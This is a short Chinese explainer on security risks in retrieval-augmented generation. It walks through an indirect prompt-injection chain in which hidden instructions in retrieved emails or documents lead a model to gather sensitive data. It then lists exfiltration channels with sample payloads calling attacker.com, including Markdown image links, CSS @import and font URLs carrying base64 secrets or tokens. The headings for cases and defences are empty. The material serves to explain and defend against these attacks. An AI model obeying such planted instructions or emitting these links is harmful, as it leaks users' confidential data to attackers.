RAG及其安全风险

一种常见的攻击手法

1. 攻击者把包含恶意外链的隐藏指令塞进某个将被索引/访问的载体（邮件、文档、网页、Drive 文件）。

2. 该载体进入检索范围，被召回进上下文。

3. 模型遵循隐藏指令，拼接或检索出内部敏感信息。

4. 模型在输出中嵌入“看似无害”的外链（如 Markdown 图片/链接，或要求调用某个 URL）。

5. 前端渲染/预览或后端处理链路自动访问该外链 → 请求到达攻击者域名 → 数据被带出。

• Markdown 图片/链接：![alt](https://attacker.com?data=...)、[text](https://...)。当内容被渲染或生成预览时会自动请求目标 URL；图片路径尤为高发，因为许多系统默认认为图片展示是安全的。通过 Markdown 格式也可以避免被 LLM 改写。

• URL 预览（Link Unfurling）：邮件/IM/协作平台在生成摘要卡片时，由客户端或服务器端抓取目标页面，从而在用户无感的情况下对外发起网络请求。

• 外部 CSS/字体/资源：<link>、@import、@font-face 等如果未被过滤，渲染阶段会下载外部资源并携带参数出网（依赖具体渲染策略）。

• 嵌入资源：<iframe>、oEmbed/OpenGraph 等富媒体嵌入，在某些平台上会触发自动加载。

• 直接回传：按提示/指令，Agent 将敏感字段拼接到攻击者控制的 API/URL 作为查询参数或请求体提交，无需任何渲染器参与。当 AI Agent 可以连接外部执行器，比如 Python 沙箱，这类行为如果权限管理不够，可能被直接利用。

• ![diagram](https://attacker.com?data={{base64(密钥)}})：前端渲染图片即触发请求，带出编码后的敏感信息。

• [链接](https://attacker.com?data=...)：聊天/邮箱客户端生成预览卡片时自动抓取该 URL，服务端或客户端在无感知下访问外域。

• <style>@import url(https://attacker.com/font.woff2?d={{token}})</style>：若渲染器允许外部 CSS/字体，加载即会出网。

具体案例

防御策略